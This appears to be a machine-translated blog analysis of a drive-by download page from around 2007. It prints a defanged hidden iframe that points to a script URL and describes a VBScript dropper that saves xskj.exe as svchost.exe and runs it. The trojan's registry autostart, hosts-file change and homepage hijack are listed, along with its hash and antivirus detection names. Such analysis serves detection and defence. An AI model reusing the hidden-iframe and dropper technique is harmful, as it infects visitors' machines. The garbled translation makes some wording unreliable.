EndurerOriginal
2Added Kaspersky's response
1Version
Qq received the URL hxxp: // hiuz *** uo * ai.cn/
Hxxp: // hiuz *** uo * ai.cn/The webpage contains code:
/-------
<IFRAME marginwidth = 0 marginheight = 0 src = "hxxp: // I *** v * r. BT *** fan.net/xskj.htm "frameborder = 0 width = 0 scrolling = No Height = 0> </iframe>
-------/
Xskj.htmThe content is the javascr into pT script program, which is used to output the vbscr into pT script program encrypted with escape.
The vbscr history PT script uses Microsoft. XMLHTTP and SCR accept pting. fileSystemObject downloads the xskj.exe file, saves it as % Temp %/svchost.exe, and then calls the custom function yunxingexe (M5, xskj9 ).
The custom function yunxingexe () is used to create the xskjc Shell. Application Object and run % Temp %/svchost.exe using the ShellExecute method of xskjc.
Xskj.exeDeveloped using Microsoft Visual Basic 5.0/6.0.
/-------
File Description: D:/test/xskj.exe
Attribute: ---
Language: Chinese (China)
File version: 1.00
Note: svch0st
Copyright: svch0st
Note: svch0st
Product: 1.00
Product Name: svch0st
Company Name: svch0st
Legal trademark: svch0st
Internal name: xc0py
Source File Name: xc0py.exe
Creation Time:
Modification time:
Access time:
Size: 40960 bytes, 40.0 KB
MD5: 20618f0ff18554c840b74494b5e8594c
-------/
Its main functions are:
/-------
1. Create the startup Item svch0st under the run key of the Registry to enable auto-start upon startup.
2. Modify the hosts file
3. Modify the registry so that the IE homepage is changed to: hxxp: // I *** v * R. BT *** fan.net/index.html, and users cannot modify the homepage through internet.pdf.
4. Play the advertisement window
-------/
Rising news:Trojan. Clicker. VB. ajn.
Rising Star Update Report: 82 new viruses can be detected in version 192.167.02
Source: rising time: 16:01:05
Http://it.rising.com.cn/Channels/Anti_Virus/Upgrade_Report/2007-01-22/1169456324d40068.shtml
The column is 59th bits.
Kaspersky reports:Trojan. win32.startpage. Ana